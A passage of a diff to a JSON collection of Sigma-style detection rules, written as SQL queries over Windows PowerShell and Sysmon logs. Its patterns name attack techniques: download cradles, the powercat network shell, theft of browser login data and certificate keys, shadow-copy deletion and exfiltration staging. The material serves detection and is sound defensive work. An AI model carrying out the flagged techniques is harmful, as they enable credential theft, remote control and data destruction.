'%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_download.yml" + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", - "id": "975b2262-9a49-439d-92a6-0709cccdf0b2", - "status": "experimental", - "description": "Detects usage of the 
\"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.defense_evasion" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "Installation of unsigned packages for testing purposes" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AppPackage %' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-AppxPackage %' ESCAPE '\\') AND ScriptBlockText LIKE '% -AllowUnsigned%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_install_unsigned_appx_packages.yml" + "filename": "posh_pc_susp_zip_compress.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "title": "PowerShell Downgrade Attack - PowerShell", + "id": "6331d09b-4785-4c13-980f-f96661356249", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", 
+ "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "posh_pc_downgrade_attack.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -7233,4739 +7161,4682 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + "filename": "posh_pc_xor_commandline.yml" }, { - "title": "Suspicious Unblock-File", - "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "status": "test", - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", - "author": "frack113", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1553.005" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE 
'3.%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_unblock_file.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "Suspicious Non PowerShell WSMAN COM Provider", + "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "status": "test", + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "posh_pc_wsman_com_provider_no_powershell.yml" }, { - "title": "Suspicious 
Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", - "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "title": "Netcat The Powershell Version", + "id": "c5b20776-639a-49bf-94c7-84f912b91c15", + "status": "test", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "posh_pc_powercat.yml" }, { - "title": "Access to Browser Login Data", - "id": "fc028194-969d-4122-8abe-0470d5b8f12f", - "status": "test", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "frack113", + "title": "Nslookup PowerShell Download Cradle", + "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "status": "experimental", + "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", + "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" ], - "filename": "posh_ps_access_to_browser_login_data.yml" + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" }, { - "title": "Potential Keylogger Activity", - "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "title": "Suspicious PowerShell Download", + "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "status": "experimental", - "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.credential_access", - "attack.t1056.001" + 
"attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_keylogger_activity.yml" + "filename": "posh_pc_susp_download.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "title": "Alternate PowerShell Hosts", + "id": "d7326048-328b-4d5e-98af-86e84b17c765", "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND 
NOT ((HostApplication LIKE 'powershell%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\') OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "posh_pc_alternate_powershell_hosts.yml" }, { - "title": "Windows Screen Capture with CopyFromScreen", - "id": "d4a11f63-2390-411c-9adf-d791fd152830", - "status": "experimental", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "author": "frack113", + "title": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", + "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "status": "test", + "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')" ], - "filename": "posh_ps_capture_screenshots.yml" + "filename": "proc_creation_win_pressanykey_lolbin_execution.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories", - "id": 
"21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "title": "Application Whitelisting Bypass via PresentationHost.exe", + "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate \".xbap\" being executed via \"PresentationHost\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' 
OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "posh_ps_import_module_susp_dirs.yml" + "filename": "proc_creation_win_lolbin_presentationhost.yml" }, { - "title": "Powershell Execute Batch Script", - "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", - "status": "test", - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "title": "Suspicious ConfigSecurityPolicy Execution", + "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "status": "experimental", + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Legitimate administration script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' 
ESCAPE '\\' OR Image LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_execute_batch_script.yml" + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.impact", - "attack.t1565" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE 
'%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Service Registry Permissions Weakness Check", - "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "author": "frack113", + "title": "Potential Arbitrary File Download Using Office Application", + "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "status": "experimental", + "description": "Detects potential arbitrary file download using a Microsoft Office application", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' 
